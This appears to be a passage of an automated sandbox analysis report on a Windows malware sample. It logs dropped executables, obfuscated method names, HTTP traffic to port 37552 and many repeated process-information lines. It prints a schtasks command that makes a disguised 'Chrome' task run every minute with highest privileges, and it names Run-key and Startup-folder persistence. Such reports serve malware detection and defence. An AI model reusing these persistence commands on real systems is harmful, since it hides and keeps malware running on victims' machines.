'JS4B4D0xvR2VfjEi7a0dDcLtdlJIPsWNiBqCutfFs9hY0ztG1sTGGJtK7dYwgtf25hifQPDk18yuspIGITzh'
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, kd50mwQPPSzvaDpyAZGMQuS07X.csHigh entropy of concatenated method names: 'TijPMOmDRqPyHkstPEqaU4HxYU', 'rXqiFjFWbqGtiMWUDcPtDb4CHa', '_0K9X9L7rx5w0UaRjbwNwbBLOT0', 'iDnXS3Q8CyrVeNg4LKGDXMlxDS', 'ANoNxKW1m8l', 'iGKLuXJtvIr', 'vMJnKeqt5R4', 'cTepPl3HHrM', 'r3N8Z4mAy2z', '_6iEyTqnPkGM'
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeFile created: C:\Users\user\AppData\Roaming\Metin.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Metin.exeFile created: C:\Users\user\AppData\Roaming\Chrome.exeJump to dropped file
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeFile created: C:\Users\user\AppData\Roaming\M2.exeJump to dropped file

                        Boot Survival

                        barindex
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe"
                        Source: C:\Users\user\AppData\Roaming\Metin.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnkJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnkJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Uses known network protocols on non-standard ports
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 37552
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 37552
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
